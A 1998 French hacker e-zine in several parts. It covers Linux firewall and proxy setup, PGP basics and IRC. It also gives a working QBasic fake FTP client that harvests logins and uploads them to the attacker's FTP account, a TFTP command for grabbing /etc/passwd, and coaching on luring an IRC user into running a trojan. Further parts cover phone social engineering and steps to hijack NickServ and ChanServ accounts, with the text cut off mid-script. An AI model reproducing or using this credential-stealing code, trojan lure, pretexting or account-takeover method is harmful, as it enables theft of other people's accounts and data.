(CONFIG_IP_FIREWALL_VERBOSE) YES Le noyau compilé , installé , redémarré vous allez être en mesure de configuré le FW. ÞPour cela on va utilisé ipfadm . La syntaxe générale est : ipfwadm -A commande paramètres [options] ipfwadm -I commande paramètres [options] ipfwadm -O commande paramètres [options] ipfwadm -F commande paramètres [options] ipfwadm -M [-l ou -s] [options] Comme vous venez de le voir il y a cinq catégories : -A configuration de l'accounting (compatibité des paquets atteignant le système) . -I règles à appliquer aux paquets TCP/IP en entrée . -O règles à appliquer aux paquets TCP/IP en sortie . -F règles à appliquer aux paquets TCP/IP à router d'une interface à une autre . -M administration de l'IP Masquerading . Perso je pourrais vous parler que des categories I , O , F , M. ipfwadm possède de très nombreuses options que je vais pas décrire ici par ce j'ai pas envie ! Lisez la doc Linux . ÞAvant de créer toute règles de filtre IP , vas falloir définir des règles de sécurité . Par exemple pour ma machine on va dire : n Toute connexion du réseau internet vers une machine interne est interdite . n De extérieur , on doit avoir accès au serveur de messagerie et au service DNS du firewall . On va dire qu'on a un réseau interne de type 193.1.1.0/24 et qu'on est relié à un sous réseau de type 193.1.2.0/24 (entre le FW et le routeur) . Le FW ayant pour adresse 193.1.1.254 en interne (eth0) et 193.1.2.1 en externe (eth1) . Je vais maintenant dire quelques uns des filtres que j'applique -ipfwadm -O -p accept La règle par défaut des paquets en sortie est accept (-p représente l'action par défaut) - ipfwadm -I -p deny La règle par défaut des paquets en entrée est deny . -ipfwadm -F -p deny La règle par défaut des paquets à router en entrée est deny . -ipfwadm -F -a accept -S 193.1.1.0/24 -D0/0 -P tcp Autorisation pour router tous les paquets TCP provenant de l'extérieur . -ipfwadm -I -a deny -S 193.1.1.0/24 -D0/0 -W eth1 Cette commande sert à lutter contre le SPOOFING (changer son adresse IP) en effet cette règle dit que tous les paquets qui rentrent dans le sous réseau sécurisé et qui ont une adresse source correspondant à une adresse du sous réseau (ce qui n'est pas logique) doivent être rejeté ! -ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 53 -ipfawadm -I -a accept -P tcp -S0/0 -D 193.2.1.1 53 Ces mesures disent que les accès au serveur DNS (port 53) sont accessible de n'importe où . -ipfawadm -I -a accept -P udp -S0/0 -D 193.2.1.1 25 Accès au serveur SMTP du firewall de n'importe où . Malheureusement on retrouve là le plus grand inconvenient des FW . En effet dans l'état actuelle système on ne pourra pas faire fonctionner un client FTP du réseau interne avec un serveur situé à l 'extérieur . Le protocole FTP prévoit l'établissement d'une connexion du serveur FTP vers le client (du port 20 -> port > 1024) Mais il y a des solutions . - Utiliser le client FTP en mode passif (A ce moment le client établit une connexion vers le serveur ftp) - Utiliser un proxy(voir section suivante) installé sur le FW qui relaiera les requêtes de l'intérieur vers extérieur . - Utiliser l'IP masquerading . - Ou alors rajouter cette règle ipfwadm -F -a accept -P tcp -S0/0 20 -D 193.1.1.0/24 1024-65535 Remarque intéressante : Si vous tombez sur un système avec une règle de ce type , vous pouvez en profitez , en effet cette règle expose les services du réseau interne qui écoutent sur un port >1024 . A partir de la vous avez plus qu'a fait partir un paquet du port 20 de votre machine vers un service . Beaucoup de services tournent sur ce port . Par exemple pour sur les ports 6000vous avez les services X-Windows . S'ils n'ont pas ete protege correctement vous pouvez matter ce que fait le mec ! Vous pouvez memes voir les toubhes frappees , les programmes lancees . Si vous faites telnet dessus vous aurez je pense l'effet d'un denial of service ; l'ecran va se geler , le sys va ralentir ... Mais il y a plus rigolo ! SI vous vous y connaissez un peu en programmation utilisez la fonction XOpenDisplay() , si la fonction retourne NULL alors c'est securise sinon ... char *hostname; if (XOpenDisplay(hostname) == NULL) { printf("Loupe : %s\n", hostname); } else { printf("Ca marche : %s\n", hostname); } Il y a a autre chose auquel il faut penser . Normalement la route qu'emprunte un paquet de se source a sa destination est determinee par les routeurs qui se trouvent entre eux . En fonction de l'adresse de destination et de leur table les routeurs se chargent de dirigier les paquets . Mais dans une trame TCP/IP , il y a une option qui porte le nom de " source routing " qui est peu utilisee . En fait on l'utilise dans le debuggage des reseaux pour trouver les problèmes . Le truc c'est que si vous envoyez un paquet en faisant croire qu'il vient de l'interieur , normalement les routeurs ne devrait pas l'ammener au FW mais le probleme la c'est qu'ils le font avec cette option . En plus c'est pas hyper du a faire ! Mais normalement il y a des options pour desactiver le "source routing " . Note : n'oubliez pas de configurer les clients de telle façon que le routeur par défaut soit le FW . --------------------- IV IP MASQUERADING .| --------------------- ÞC'est une technique de plus en plus utilisée . Elle consiste à masquer totalement l'adressage IP du réseau interne ( On peut donc utiliser des adresses IP privées ) . Ainsi chaque paquet qui traverse le firewall est modifié pour faire croire qu'il n'y a qu'un seul système connecté . Tout le réseau interne partage ainsi l'adresse IP (externe) du FW . ÞInstallation : Bon beh va falloir recompiler le noyau (c'est la fête !) et répondre YES aux questions : IP : forwarding/gatewaying (CONFIG_IP_FORWARD) IP : firewalling (CONFIG_IP_FIREWALL) IP : firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE) IP : masquerading (CONFIG_IP_MASQUERADE) IP : ICMP masquerading (CONFIG_IP_MASQUERADE_ICMP) (Répondez oui que si le FW doit router les paquets ICMP) ÞMaintenant vous allez être en mesure d'utiliser une autre des 5 options d'ipfwadm : l'option -M . Pour cela utiliser l'option -l qui liste les connexions qui utilisent l'IP masquerading et -s qui fixe le timeout . Pour autoriser le masquerading il faudra les règles suivantes - ipfwadm -F -p deny - ipfwadm -F -a masquerade -S 192.10.10.0/24 -D0/0 V PROXY . ÞD'après ce que j'ai lu et ce qu'on m'a dit la meilleure solution pour utiliser une machine Linux en proxy consiste à utiliser l'ensemble d'outils qu'offre TIS . Ils fournissent un package connu sous le nom de FW toolkit . Vous pouvez le telecharger sur le site Web de TIS http ://www.tis.com/docs/products/fwtk/index.html ÞInstallation Bon comme vous allez être un Proxy , il va falloir forcement désactiver la fonction de routeur de Linux . Pour cela on recompile le noyau en répondant NO au forwarding/gatewaying (CONFIG_IP_FORWARDING) . Vous êtes pas obligé de mettre cette option mais si vous ne le faites pas les machines du réseau interne seraient directement accessibles de l'extérieur à travers les possibilités du FW . Si l'IP forwarding est laisse , alors la il y a une faille mais la je connais pas du tout ,en fait la solution serait de downer le firewall , ainsi le FW ne marcherait plus mais le noyau lui continuerait a router les paquets sans suivre les règles ! Pour ça , il y a des solutions diverses et pas très gentilles comme le SYN flooding et autres attaques barbares . Bon vous compilez les outils TIS en suivant les instructions . ÞConfiguration La table netperm réside dans le fichier /usr/local/etc/netprem-table . Cette table décrit la configuration principale de tous les composants du Trusted Firewall Toolkit . Quand une des applications est lancée elle va chercher sa config dans cette table ÞDescription : -Netacl : Cette application permet de donner l'accès aux différents services TCP . Ce programme se démarre depuis le super-démon inetd . Si par exemple on ajoute au fichier /etc/inetd.conf telnet stream tcp nowait root /usr/local/etc/netacl telnetd Avec ca quand une requête atteint le port ftp du système netacl se démarre avec comme paramètre telnetd . Mais avant que le démon soit lance le logiciel vérifie que la requête est valide selon la table . Par exemple si je veux autorise aux personnes de mon réseau interne de se connecter au telnet du FW faudra ajouter : netacl-telnetd : permit-hosts 193.1.1.* -exec /usr/sbin/in.telnetd (note 193.1.1.* équivaut à 193.1.1.0/24) Après on a aussi tous les logiciels qui implementent un relais pour les services . En fait le client fait d'abord une requête au service du FW puis de la fait une requête pour se connecter au site extérieur . Selon les règles du proxy cette connexion sera refusée ou acceptée . -tn-gw : relais pour le service telnet . -ftp-gw : relais pour le service ftp . -rlogin-gw : relais pour le proxy rlogin . -http-gw : relais pour client HTTP et gopher .( pratique pour empêcher certaines applications JAVA ) .... Il y en a d'autres mais je les connais pas tous donc pour plus de renseignement allez voir vous même ! exemple de config de /usr/local/etc/netperm-table : tn-gw : deny-hosts * -dest 193.1.1.* Interdiction a ces machines d'accéder au service telnet . tn-gw : permit-hosts 193.1.1.25 autorise la machine 193.1.1.25 a accéder au service telnet . Pas compliqué et je vous jure que c'est incroyable tout ce que l'on peut faire et les espèces de trou dans la sécurité que ca peut faire ! ---------------------------------------------- VI Assainissement et protection du Firewall .| ---------------------------------------------- Bon vous avez compris , quand on veut attaquer un système qui possède un FW il y a pas 36 choix il faut attaquer le FW . Alors reste plus qu'à trouver les points faibles et donc il faut vérifier la protection de cette machine . On va maintenant voir comment on assainie un Firewall . Premièrement, regardez le fichier /etc/inet.conf. Ce fichier est ce qu'on appelle un "super-serveur". Il lance un tas de démons serveurs sur demande . Il contient la liste des services offerts . Il faut enlever tous les services qui ne sont pas parfaitement obligatoire comme NIS, NFS, rsh, rcp, netstat,systat,tftp,bootp et finger... NOTE qui peut faire gagner du temps : Il n'est pas nécessaire de tout désactiver. Pour désactiver un service, placez simplement un # devant. Ensuite envoyez un signal SIG-HUP au processus inetd, selon la syntaxe suivante : kill -HUP , ou pid est le numéro du processus inetd. (Pour avoir le PID si vraiment vous êtes débutant sous Linux , faites ps -uax |grep inetd ) . Cela force inetd a relire son fichier de configuration (inetd.conf) et a se relancer . Petite astuce : Si TFTP est ouvert tenté le coup , ce protocole permet de transférer des fichiers comme ftp mais s'appuie sur le protocole UDP. Il est donc moins sur et ne peut servir que pour les fichiers de petite taille . Mais surtout il ne demande pas de MOT DE PASSE ET DE COMPTE UTILISATEUR ! Donc tout utilisateur qui a accès au port 69a accès à tous les fichiers lisibles par le démon correspondant . Il y a peut être de bonnes infos à prendre . tentez ca : evil % tftp tftp> connect victim.com tftp> get /etc/passwd /tmp/passwd.victim tftp> quit Pour la sécurité Il faut aussi bien évidemment supprimer tous les comptes utilisateurs inutiles . Il faut aussi supprimer tous les package installés qui n'ont rien à faire sur un firewall comme X window , les services NFS et Samba , les jeux (OK c'est discutable pour le dernier ) ..... Exemple type de machine ou on installe un firewall : Je vais prendre mon PC , un 166MMX , 32 Mo de Ram et une partition de 800 Meg pour Linux avec une connexion PPP a un fournisseur Internet (ça je l'ai pas encore L ) par un modem 36,6 kbps. Pour en faire un firewall , On ajoute un carte ethernet compatible NE2000. Il est alors connecte a trois autres PC . Et voilà un firewall typique . ÞPour protéger le firewall (en effet c'est lui qui va se prendre dans la gueule toutes les attaques) il faut utiliser un filtre de paquet . Pour faire ca on recompile le noyau avec ces options : IP : forwarding/gatewaying (CONFIG_IP_FORWARD) NO IP : firewalling (CONFIG_IP_FIREWALL) YES IP : firewall packet logging (CONFIG_IP_FIREWALL_VERBOSE) YES On s'inspira des règles sur le filtrage des paquets exposé dans le III notamment celle contre le spoofing ! tromh@yahoo.com www.altern.org/trom Greetings : C-A, R3Z0 , Kortex agency , i-e , tous les gars sur #hack.fr (undernet) /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ ¨PGPÁÃNP6÷=|—ûȺáG `.$ÿÙpû~’͹:­Ï “Dü;qѨII‚îÐ,]·ßòR¬ýGQ„$;¶ÿÙp a‰§œLÛ—j¯i™„e‡3j’0¿v|-------------------------|K<Ü»ƒÛ$àïPr$«Ë ÌÝ÷Û$ cÌIóFÖ-o€–<ˆn:Ä°²¼×µÌ£Õ,| PGP |q4˜EýbbH-f–»ücWë´nO,Üп$Û˜JÆà”‰–~ ½f|-------------------------|C­m±d°TIf»ï!aÜy¿œ5¿œ$ÿ ý.¸èQw” !cÌIóFÖ-o<ˆn:Ä°²¼× Sd°TIf»ï!aÜy¿œ5À»ÏÊ8 ì’͹:­Ï “]·ßü; ------------------ I-What is PgP ???| ------------------ Retournez a l'ecole revoir votre vocabulaire ... :)) ---------------------------- II-Pourkoi utiliser PgP ???| ---------------------------- Ben ca parait evident, meme si en france c interdit.... Vous voyez vot mail ??? Ben c very simple de le hacker. Y'a qu'a spoofer le service passwd pour avoir votre passwd. Dites vous deja que vous vous etes deja fais hacker vot mail. Y'avait rien de CONFIDENTIEL dans vot mail ????? --------------------------- III-Comment ca marche ??? | --------------------------- 1-Les systemes à cle privee : ----------------------------- Ces systemes utilisent une clee unique pour crypter et decrypter Pour les amateurs en math comme moi ;) : Soit une clé k et un texte clair P, on obtient le texte chiffré C par l'application de l'algorithme f : C = f k (P) et l'opération inverse pour le déchiffrement : P = f' k (C) Si f = f', alors le système est dit symétrique. 2-Securite : ------------ Ce systeme est securise seulement si la cle ne circule po partout. Faut donc que vous vous debrouillez pour ne po faire circuler votre cle n'importe comment... (evitez le mail, donc) 3-Les systemes à cle publique : ------------------------------- Dans ce systeme, il n'y a pas une mais deux cles. L'une sert au chiffrement et l'autre au déchiffrement. La premiere est publique (prise d'un bouquin, d'un annuaire...), la seconde et secrete. Math : Principe : soit le texte clair P, une clé privée pr, une clé publique pu et l'algorithme f, nous avons : C = f pu (P) P = f pr (C) La relation fonctionne dans un sens : il est simple à partir de la clé privée de générer la clé publique mais l'inverse est considéré comme très difficile ou "avec les moyens actuels, impraticable''. 4-Principe des signatures : --------------------------- Generation d'un Message Digest qui identifie, par un nombre de taille fixe, le texte lui-même, Chiffrement de cette valeur par RSA avec la clé privée de l'expéditeur, permettant aux correspondants de vérifier la validité avec la clé publique de l'expéditeur. Math : Soit M un message de taille arbitraire et H une fonction, h est le résultat de l'application de H sur M : h = H(M), avec h de longueur m H est une fonction "trappe'', utilisée dans un seul but : fournir un identificateur unique pour un message. Voila vous savez tout. Si vous etes pas bon en math, laissez tomber l' encription... ;))) steal /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ Le hack des newbies ;);););););););););););););););););););););););););););););););););););););) ;););) |Hacker sous irc ou comment montrer que win95 c de la merde!!!| ;);); ;);););););););););););););););););););););););););););););););););););););) YES!!! Cette article est pour rassurer les frustres du hack ki ne se sont po encore, tapez de becane... Mais j'insiste sur le fait que penetrer une becane est illegale et que ce txt et la qu'a but informatif seulement... Bon je v d'abord rappeller brievement ce qu'est un cheval de troie avant de commencer : un cheval de troie ou taupe et un programme qui lorsqu'il est loge sur une machine peut vous donner l'acce à cette meme machine. Bon, y'a un programme qui s'appelle hackerparadise... Ce prog est constitue de 2 parties : explor.exe et paradise.exe... L'un doit etre sur la machine de la victime, l'autre sur la vot. Sur l'irc inventez un gros ballourd pour inciter les autres à prendre explor. exe (j'espere que vous aurez pris la precaution de changer son name)... DCC le moi stp!!! ouep, bien sur merci!! hehehehe pourkoi tu rigole ????? parceque j'aime qu'on me leche le cul !!! dite a votre victime de le lancer online. ben, ca marche po ton prog, y'a po de fenetre... :(((( ah, bon????? Doit y'avoir un probleme sur ta becane... Ba, non alor, elle est toute neuve !!! J'espere que vous aurez compris que explor.exe est une taupe... Lancez paradise.exe, allez sur connect, tapez l'ip du mec, et connectez vous. La vous avez tout les droits... Pourkoi vous avez tout les droits ??? Parceque sur une becane win, y'a pas de pyramide de privilege, et que toutes personne qui connecte sur une becane windaube a tout les droits... Cendrine c ki ??? ???? ta petite ami ??? comment tu sais ca ??? OUUUUU, tu as red alert ??? ?????? T'as hacker ma machine ????? hehehehehe stp supprime rien, stp!!! hehehehehe Pourkoi tu rigole c po drole!!! Supprime rien stp... :((( j'aime qu'on me leche le cul.... steal /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ ---[ hacker facilement les Comptes ftp, telnet, mail :]--- CODE MAG By CODE-BAR N° 1 Hacker Facilement des Comptes FTP,Telnet, Mail : Cette technique demande très peu de connaissances. Elle s'adresse plutôt aux Newbies (débutants). Pour qu'elle marche, elle demande que l'utilisateur en face ne soit pas trop prudent. Voici comment nous allons procéder : Nous voulons obtenir le Login et le Password d'un compte FTP. Pour cela, nous allons bricoler un logiciel FTP bidon. J'entends par logiciel FTP bidon : un logiciel ayant l'apparence d'un client FTP (comme WS-FTP) mais qui n'en est pas un. Il nous faudra également un compte FTP nous appartenant. (Chez Mygale sa devrais faire l'affaire). Donc, notre logiciel FTP bidon demandera (comme tout logiciel client FTP) à l'utilisateur le nom du serveur sur lequel est son compte, son Login et son Password. Ensuite, il enregistrera ces infos dans un fichier. Une fois les infos enregistrées, le programme devra les envoyer directement dans notre compte. Et voila ! A présent, Il nous suffit d'aller relever dans notre compte les fichiers qui contiennent les accès à l'aide cette fois d'un vrai client FTP. L'exemple suivant est utilisé pour un compte FTP mais vous pouvez adapter cette technique pour tout autre type de comptes en modifiant simplement l'aspect extérieur du programme. Voici le code source du programme en Q-Basic. Vous pouvez bien évidement adapter ce code dans un autre langage. Vous trouverez les fichiers sources en VB4 dans ce E-Mag. A vous d'améliorer le dezine... ------ rem [Générateur Aléatoire] Randomize Timer rem [Infos sur le compte FTP] cls input "Veuillez rentrer l'adresse de votre serveur FTP "; A$ input "Veuillez rentrer votre Login "; N$ input "Veuillez rentrer votre Password "; P$ rem [Création d'un nom aléatoire de fichier pour le téléchargement sur votre compte] For X = 1 To 5 F$ = F$ + Chr$(65 + Int(Rnd * 26)) Next rem [Création d'un nom aléatoire de fichier pour les commandes FTP] For X = 1 To 5 G$ = G$ + Chr$(65 + Int(Rnd * 26)) Next rem [Création d'un nom aléatoire pour le fichier Batch (*.bat) qui executera les commandes] For X = 1 To 5 B$ = B$ + Chr$(65 + Int(Rnd * 26)) Next rem [Enregistrement des infos du compte dans un fichier] Open "C:\" + F$ For Output As #1 Print #1, A$ Print #1, N$ Print #1, P$ Close #1 cls print "Connect to " + A$ rem [Enregistrement des commandes FTP] Open "C:\" + G$ For Output As #1 Print #1, "open www.exemple.com" Print #1, "quote user code-bar" Print #1, "quote pass h5fila45" Print #1, "put C:\" + F$ + " x" + F$ Print #1, "close" Close #1 rem [Enregistrement des commandes dans le fichier batch] Open "C:\windows\" + B$ + ".bat" For Output As #1 Print #1, "@echo off" Print #1, "C:\windows\ftp -v -n -s:C:\" + G$ Print #1, "cls" Print #1, "del C:\" + F$ Print #1, "del C:\" + G$ Print #1, "cls" Close #1 rem [Démarrage du fichier de commandes (Batch)] Shell "C:\windows\" + B$ + ".bat" Shell "del C:\windows\" + B$ + ".bat" rem [Fin de la procédure et erreur simulée] cls Print "Error (520) FTP Connexion failed" boucle: goto boucle ------ Maintenant que votre petite saloperie est prête, vous l'envoyez par E-Mail (maquillé en message de promotion) à la personne que vous voulez choper. Vous attendez que votre gars tombe dans votre petit piège. Et Voila ! Il vous suffit de vous connecter sur votre compte et d'aller rechercher les fichiers qui commencent par un p'tit "x" ! /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ LE Social Eingineering Je devais faire un article sur le SE dans ce mag depuis plusieurs mois déjà. Mais entre temps, le mag du groupe frhack est sorti est il y avait un article sur le SE à l'interieur. En comptant aussi l'article de NoWay, ca allait faire trois article parlant de la même chose. Alors plutôt que de faire un article reprenant tout depuis le début, j'ai préferé faire un complément à l'article de NoWay et de frhack. Vous ne trouverez ici que des conseils, et pas trop de définition. Bonne lecture. Niveau exigé pour faire du SE : débutant Limite du SE : -Ne se pratique que dans des pays ayant la même langue que vous (sauf si vous parlez plusieurs langues parfaitement) Bon, je passe donc rapidement sur la définition, vu que maintenant tout le monde la connait (quoi que c'est même pô sur...) Le Social Eingineering est l'art de se faire passer pour quelqu'un que l'on est pas dans le but de soutirer des informations confidentielles. En fait le SE est plus dur que l'on pourrait le penser. Il faut être assez fort pour ne pas que la personne que l'on encule ait des doutes, mais aussi repartir avec suffisement d'information interessante pour que ce que vous avez fait vaille le coup (c'est comme ca l'orthographe de 'vaille' ??) ----------------------------------------------------------------------------- IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP 1) Un très bon entrainement au SE est de faire des canulars telephoniques. Plus vous en faites et plus vous arrivez à faire avaler des choses énormes à vos victimes, et plus vous pourrez vous dire que vos séances de SE seront une réussite... IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP ----------------------------------------------------------------------------- Il faut aussi faire attention à se positionner selon la personne que l'on a à l'autre bout du fil (ayez une personalitée différente en fonction que vous avez en face de vous une secretaire ou un 'expert sécurité' ;) ). Pour faire une bonne attaque au SE, il faut avoir un minimum d'information sur la société ou l'organisme que l'on veut penetrer. Brain Override donne pour conseil de se faire passer pour un journal ou une radio afin d'obtenir cas informations. Une autre méthode bien cool est le trashing: faire les poubelles. Vous n'aurez pas forcément vos informations du premier coup, mais vous risquez aussi de repartir à la fin avec beaucoup plus d'informations que vous n'en auriez eut en vous faisant passer pour un journal... Apres les préparatif, on peut passer à l'attaque... ----------------------------------------------------------------------------- IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP 2) Reglez votre voix ! J'explique: au telephone, les gens peuvent reconnaitre assez facilement une personne entre 15-30 ans et une personne au dessus de 40 ans, grâce au timbre de la voix. Si vous vous faites passez pour une personne de 40 ans, alors que vous avez 15 ans, même si votre voix a muée depuis longtemps, votre interlocuteur risque de s'en rendre compte... Pour parer cela, inventez-vous un perso qui a environ votre âge (si vous avez entre 15 et 20 ans, une voix d'un mec jusqu'a 30 ans passe encore), ou alors essayez de trafiquer votre voix. Ce n'est pas vraiment une bonne solution, parce que si vous avez un probleme au tel et que votre voix passe brusquement de celle d'un mec de 40 à celle d'un gamain de 15, vous serez grillé à fond ! 3) Il ne faut pas hésiter à ce servir de fille quand cela est possible. On se méfie beaucoup moins d'une fille que d'un mec. Alors prenez une copine, faites lui un texte approprié ou vous la faite passer pour votre secretaire, standardiste (...), faites lui répeter son texte et lancez-la ! Si a un moment le mec lui pose une question à laquelle elle ne peut pas répondre, faites lui dire: "Attendez 5 secondes, monsieur, je vous passe mon supérieur...", prenez le combiné au bout de quelques secondes pour faire comme si vous arriviez de votre bureau, et répondez à la question (attention, lisez le tips 2 et reportez le ici ! !). EFFETS GARANTIS ! ! ! (sauf si la question était: "Quel est le nom de votre organisme/société" et que votre pouf de copine n'a pas pu improviser pour ca) IPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIPS-TIP ----------------------------------------------------------------------------- Bien entendu, votre social eingineering ne marchera pas si votre texte est de la merde. Et comme je suis gentil, je vais vous donnez quelques aides... ;) En fait, vous devez avoir des feuille avec TOUT les renseignements qui pourraient vous servir lors de votre attaque. Personelement, je ne prépare pas UNE feuille mais TROIS. Sur la premiere je mets tout les renseignements concernant ce que je veux penetrer: Nom du responsable informatique, nom du boss... Vous devez mettre le maximum d'information, ca peut toujours vous aider. Sur la deuxieme, je mets ma propre fausse identité, mon age, mon nom, ma société, en fait, tout ce que la personne que je vais avoir au bout du fil est susceptible de me demander. Enfin, sur la troisieme, je mets mon scénario, quelques réponses bateau, et les renseignements que je dois avoir obtenu à la fin. L'avantage d'avoir trois feuille au lieu d'une, est que les renseignements sont bien mieux classés, ainsi, si l'on vous pose une question, vous perdrez moins de temps à chercher la réponse, donc il y aura moins de risque que la personne au bout du fil ait un doute. Bon, maintenant quelques conseils avant de faire une attaque: -répétez plusieurs fois votre rôle jusqu'à ce que vous l'ayez parfaitement assimilé et que vous n'ayez plus à vous servir de vos feuilles. Ces dernieres ne vous seront utiles quant cas d'oubli pendant le SE. -Gardez toujours votre voix naturelle au télephone. Sauf si vous êtes très fort, une voix trafiquée se remarque tout de suite, et vous allez vous faire mechement jeter!!! Voilà, si vous avez lu l'article de NoWay et celui de Brain Ocerride dans frhack, vous pouvez vous lancer, vous avez toutes les informations necessaire pour le réussir. Si vous avez encore des trucs, n'hésitez pas à m'ecrire. Pour les suggestions pareil. Pour des questions, vous pouvez essayer mais ce n'est pas sûr qu'il y aura une réponse... ;) Enfin, je recherche le maximum d'information sur le protocol TCP/IP pour ma culture personelle. Mon E-Mail: tripbomb@hotmail.com Bye. Tripbomb. /----------\ /(__)____(__)\ |#h/p/c/l/p-1| / xx/yy/1998 \ \##############/ \&&&&&&&&&&&&/ \__________/ Hacking IRC (Internet Relay Chat) Par SoD ----------------------------------------------------------------------------------------------------- (J'ai utilise pour cela Win95 et mIRC) Ok on y va: Pour faire partie de l'IRC vous avez besoin de deux choses. Un client IRC (ex: mIRC) et une connection Internet . Qu'est ce qu'un client IRC ? Un client IRC est un programme qui vous permet de vous connecter a un serveur IRC (allez sur: www.mircx.com). Si vous utilisez deja IRC cela ne sert a rien de lire la prochaine section. :) Les bases de l'IRC: Pour pouvoir hacker mIRC vous devez bien sur connaitre toutes les commandes. Allez dans l'help de mIRC et cherchez aussi des textes sur IRC. Il faut aussi connaitre les regles de certains serveurs (ex: irc.dal.net ). ----------------------------------------------------------------------------------------------------- Le Sp00fing: Le Sp00fing est ce que tous les hackers voudraient maitriser sur IRC. C'est tres facile! Qu'a ton besoin pour faire ca ? RIEN! juste un client IRC! Pourquoi spoof? Cela permet de cacher son identite sur IRC, et de pouvoir hacker des channels. (DalNet) Wingate: Wingate est un proxy qui permet a plusieurs ordinateurs de se connecter a Internet avec le meme modem. Qu'est ce que cela a avoir avec le spoofing? TOUT! Vous pouvez utiliser Wingate pour cacher votre identite sur un serveur IRC. Comment utiliser wingate pour spoofer?: Vous avez besoin de l'ip d'un ordinateur wingate et de votre client IRC (ex: mIRC). Copier ce script et mettez le dans votre popup menu: --------------Copier apres cette ligne--------- Sp00f .Connect to Wingate IP:/server $$?="Enter Wingate IP:" 23 .Connect to Undernet:/raw us.undernet.org 6667 | /raw user $$?="Enter four words (la lal ala lal)" | /raw nick $$?="Enter NickName:" .Connect to DALnet:/raw irc.dal.net 7000 | /raw user $$?="Enter four words (la lal ala lal)" | /raw nick $$?="Enter NickName" .Connect to Other:/raw $$?="Enter Server And Port#" | /raw user $$?="Enter four words (spoof bT hax0r blah):" | /raw nick $$?="Enter NickName:" ---------------Arretez de copier avant la ligne ----------------- Une fois que vous avez copier tout ca allez sur mIRC et cliquez sur le bouton droit de votre souris et clickez: Connect to Wingate IP. Si vous n'avez pas d'ip wingate demandez le ou cherchez en un vous meme. Une fois connecte a un Wingate ceci devrait apparaitre: ÿû ÿûÿýWinGate>NICK bT Connecting to host NICK...Host name lookup for 'NICK' failed USER hax0r "admin.pentagon.gov" "207.68.156.53" °¨¨°º©[ ëtë®ñÅl thûG ]©º°¨¨° Connecting to host USER hax0r "admin.pentagon.gov" "207.68.156.53" ...Host name lookup for 'USER hax0r "admin.pentagon.gov" "207.68.156.53" ' failed C'est tout a fait normal. Sinon il ne s'agit pas d'un IP Wingate. Une fois apres avoir fait ca erclickez sur le bouton droit de la souris et allez sur: "connect to DALnet". Ceci devrait apparaitre: connected to host irc.dal.net 6667 . Suivez les instructions et quand on vous demande 4 mots mettez un mot qui se raproche de votre nick. Facile hein? Hackez les mots de passe des Nickserv et des Chanserv (sur DalNet) : C'est legerement plus complique : Mots de passe Nickserv : C'est tres facile de les hacker. Disons que vous voulez hacker le mot de passe de LameHax0r . Tapez /msg nickserv info lamehax0r et vous allez avoir quelque chose comme: [18:46] -NickServ- *** LameHax0r is Lamer [18:46] -NickServ- Last seen address: lamer@209.76.160.41 [18:46] -NickServ- Last seen time: Wed 04/01/98 21:53:17 GMT [18:46] -NickServ- Time registered: Mon 11/03/97 02:25:52 GMT [18:46] -NickServ- Time now: Wed 04/01/98 23:24:18 GMT [18:46] -NickServ- *** End of Info *** Vous connaissez donc sa derniere adresse IP . C'est ce que vous allez utiliser pour faire un Wingate sp00f. Scanner l'ip avec un scanneur ouvrant les ports 23. Ouvrez le port 23. Apres ca vous devez cacher votre identite avec wingate. La derniere adresse connue est lamer@209.76.160.41 son ident est lamer. Quand le spoof script vous demande 4 mots mettez "lamer lamer lamer lamer". Quand il vous demande un nick mettez: LameHaxor . Vous devriez etre @209.76.160.* . Aprez ca allez sur #operhelp et dites que vous avez oublier votre mot de passe. Un IRCOP va vous poser des questions, inventez une histoire. ( Ne changez pas les mots de passe passwords parce que sinon on peut vous retrouver!). Hacker les mots de passe des Chanserv: C'est presque aussi facile que pour les nickserv mais un peu plus long. Tapez ex: #victime type /msg chanserv info #victime et vous allez avoir: [19:02] -ChanServ- *** Info on #Nuke [19:02] -ChanServ- Founder : lamehax0r (f00l@stupidass.lamer.com) [19:02] -ChanServ- Mode Lock : off [19:02] -ChanServ- Last Topic : This channel is LAME!!!(lamehax0r) [19:02] -ChanServ- Description: For lame discussion come here.... [19:02] -ChanServ- URL : http://www.lamers.com [19:02] -ChanServ- Options : Ident, Topic Lock(F) [19:02] -ChanServ- Memo level : AOP [19:02] -ChanServ- Registered : Fri 01/16/98 04:47:25 GMT [19:02] -ChanServ- Last opping: Wed 04/01/98 23:39:31 GMT [19:02] -ChanServ- *** End of info Vous savez donc que le createur du channel est (Lamehax0r) et que ca derniere adresse etait (f00l@stupidass.lamer.com). Demmarer votre scanneur et scanner (lamer.com). Utilisez comme ident (f00l) et trouvez son mot de passe Nickserv. Allez ensuite sur #operhelp en utilisant son nick et dites "i forgot my channel pw". Une fois que vous avez raconter une histoire le chan est a VOUS! Protection: Une bonne protection sur IRC est tres importante. Telechargez Nukenabber pour ecouter les ports (www.dynasol.com/~puppet/) . Et copiez ce texte: ------------------Mettez ca dans ALIASES SECTION!------------------ nbb { %bban = $chan(0) if ( -u isin $$1) set %unban yes :one if %bban == 0 { unset %unban | halt } if ((%unban == yes ) && ($me isop $chan(%bban))) { mode $chan(%bban) +b $$2 .timer 1 $remove($$1,-u) mode $chan(%bban) -b $$2 if (($3 ison $chan(%bban)) && ($3 !isop $chan(%bban))) { kick $chan(%bban) $3 G-ban : $4- } dec %bban | goto one } elseif ( $me isop $chan(%bban) ) { mode $chan(%bban) +b $$1 dec %bban | goto one } else { dec %bban | goto one } } nuke { set %port $parm3 